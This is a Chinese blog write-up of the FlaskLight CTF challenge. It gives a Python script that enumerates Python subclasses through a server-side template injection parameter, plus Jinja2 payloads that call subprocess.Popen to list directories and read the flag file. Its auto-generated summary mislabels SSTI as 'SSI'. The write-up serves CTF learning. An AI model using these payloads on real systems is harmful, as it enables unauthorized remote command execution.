[CSCCTF 2019 Qual]FlaskLight

最新推荐文章于 2024-07-19 15:12:55 发布
最新推荐文章于 2024-07-19 15:12:55 发布
阅读量636 收藏
点赞数
分类专栏: BUUCTF 文章标签: flask ssti
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124078153
版权
本文探讨了如何在Flask应用中识别并利用Substitution String Injection (SSI)漏洞,通过逐步寻找可执行指令,如`popen`,实现目录遍历获取flag。关键在于理解__subclasses__方法的应用和字符串转义技巧。
摘要由CSDN通过智能技术生成 
知识点:ssti

题目已经告诉我们是flask,且知道了参数,一看就是ssti
在这里插入图片描述
找可以利用的,例如这边的popen
在这里插入图片描述
然后就是读目录拿flag了。
在这里插入图片描述

在这里插入图片描述
找可以利用的类:

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://bfc795b4-2e86-4198-975d-8339d8a1d455.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))


?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

参考:
https://blog.csdn.net/mochu7777777/article/details/107589811

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1554
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
QUAL2K模型
04-22
QUAL2K模型是一个综合性、多样化的河流水质模型,不仅适用于复杂的树枝状河流系统,还允许多个取水口、排污口存在以及支流流入流出,被广泛应用于流域污染物总量控制和水质管理。
[CSCCTF 2019 Qual]FlaskLight 1
最新发布
ubaichu的博客
07-19 921
[CSCCTF 2019 Qual]FlaskLight 1 详细解题步骤
qual2k模型论文
10-15
qual2k 模拟 水质模型 参数模拟设置 如何计算 适用于研究生水质模型计算参考
checker-qual-3.5.0-API文档-中文版.zip
06-05
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-compat-qual-2.0.0-API文档-中文版.zip
06-05
赠送jar包:checker-compat-qual-2.0.0.jar; 赠送原API文档:checker-compat-qual-2.0.0-javadoc.jar; 赠送源代码:checker-compat-qual-2.0.0-sources.jar; 赠送Maven依赖信息文件:checker-compat-qual-2.0.0....
checker-qual-2.11.1-API文档-中英对照版.zip
07-14
赠送jar包:checker-qual-2.11.1.jar; 赠送原API文档:checker-qual-2.11.1-javadoc.jar; 赠送源代码:checker-qual-2.11.1-sources.jar; 赠送Maven依赖信息文件:checker-qual-2.11.1.pom; 包含翻译后的API文档...
CSCCTF-2019-Qual-FlaskLight
Tajang的大千世界
02-09 318
CTF
[CSCCTF 2019 Qual]FlaskLight 记录
SopRomeo的博客
10-09 896
这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 存在sql注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{''.__class__.__mro__[2].__subclasses__()}} 利用这个可以读取所有的类,然后看看能不能RCE 找到catch_warnings类, 但是无法RCE 看了wp,发现可以利用subprocess.Popen这个类来进行RCE 学废了 网上搜的模板注入,都没
thermo xcalibur qual browser 下载
09-23
thermo xcalibur qual browser 是为了分析质谱数据而设计的一款软件。 要下载 thermo xcalibur qual browser,可以按照以下步骤进行: 1. 首先,打开谷歌浏览器或其他任何你常用的浏览器。 2. 在搜索栏中输入 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值